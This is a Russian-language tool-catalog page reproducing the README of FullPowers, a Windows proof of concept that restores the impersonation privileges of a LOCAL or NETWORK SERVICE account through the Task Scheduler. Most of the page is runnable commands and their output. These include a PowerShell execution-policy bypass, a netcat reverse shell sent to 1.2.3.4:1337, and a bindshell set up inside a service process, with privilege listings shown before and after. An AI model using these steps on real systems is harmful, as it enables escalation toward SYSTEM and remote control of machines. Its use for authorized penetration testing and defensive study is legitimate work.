Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
FullPowers — Восстановить набор привилегий по умолчанию для учетной записи LOCAL/NETWORK SERVICE | Kitploit
Инструменты/GitHubGitHub/itm4n/fullpowers
Повышение привилегийЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed TeamingArchived
GitHubitm4n/fullpowers

FullPowers

Восстановить набор привилегий по умолчанию для учетной записи LOCAL/NETWORK SERVICE

Репозиторий
7001026 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

FullPowers

FullPowers — это инструмент Proof-of-Concept, созданный мной для автоматического восстановления набора привилегий по умолчанию учётной записи службы, включая SeAssignPrimaryToken и SeImpersonate.

Обоснование

В Windows некоторые службы, выполняемые от имени LOCAL SERVICE или NETWORK SERVICE, настроены на работу с ограниченным набором привилегий. Поэтому, даже если служба скомпрометирована, вы не получите золотых привилегий олицетворения, и повышение привилегий до LOCAL SYSTEM должно быть более сложным. Однако я обнаружил, что при создании запланированной задачи новый процесс, созданный службой планировщика задач, имеет все привилегии по умолчанию соответствующей учётной записи пользователя (кроме SeImpersonate). Таким образом, с помощью некоторых манипуляций с токенами можно породить новый процесс со всеми недостающими привилегиями.

Для получения дополнительной информации: https://itm4n.github.io/localservice-privileges/

Использование

⚠️ Этот инструмент должен запускаться только от имени LOCAL SERVICE или NETWORK SERVICE.

Вы можете проверить справку с помощью опции -h.

root@kitploit:~
c:\TOOLS>FullPowers -h

FullPowers v0.1 (by @itm4n)

  This tool leverages the Task Scheduler to recover the default privilege set of a service account.
  For more information: https://itm4n.github.io/localservice-privileges/

Optional arguments:
  -v              Verbose mode, used for debugging essentially
  -c <CMD>        Custom command line to execute (default is 'C:\Windows\System32\cmd.exe')
  -x              Try to get the extended set of privileges (might fail with NETWORK SERVICE)
  -z              Non-interactive, create a new process and exit (default is 'interact with the new process')

Пример 1, базовое использование

root@kitploit:~
c:\TOOLS>FullPowers
[+] Successfully created scheduled task. PID=9976
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>

Пример 2, указание пользовательской команды

root@kitploit:~
c:\TOOLS>FullPowers -c "powershell -ep Bypass"
[+] Successfully created scheduled task. PID=9028
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> Get-ExecutionPolicy
Bypass

Пример 3, запуск обратного шелла netcat и выход

root@kitploit:~
c:\TOOLS>FullPowers -c "C:\TOOLS\nc64.exe 1.2.3.4 1337 -e cmd" -z
[+] Successfully created scheduled task. PID=5482
[+] CreateProcessAsUser() OK

Инструкция

Хотите протестировать этот PoC самостоятельно? Отлично! Вот несколько простых инструкций, чтобы начать.

Общая идея состоит в том, чтобы запустить bindshell из процесса существующей службы, подключиться к нему, а затем запустить исполняемый файл.

  1. Вам понадобятся два сторонних инструмента: netcat и RunFromProcess.
  2. Выберите службу с ограниченными привилегиями, например upnphost.
  3. Откройте Диспетчер задач, перейдите на вкладку Службы и найдите PID соответствующего процесса.
  4. Используйте следующую команду для запуска bindshell от имени администратора:
root@kitploit:~
C:\TOOLS>RunFromProcess-x64.exe <PID> C:\TOOLS\nc64.exe -l -p 9001 -e cmd
  1. Используйте следующую команду для подключения к bindshell:
root@kitploit:~
C:\TOOLS>nc64.exe 127.0.0.1 9001
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects    Enabled
  1. Мы видим, что текущий процесс не имеет привилегий олицетворения. Теперь запустите PoC...
root@kitploit:~
c:\TOOLS>FullPowers
[+] Started dummy thread with id 5568
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19041.84]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\local service

C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

Теперь у вас должна быть оболочка с привилегиями олицетворения!

Скачать инструмент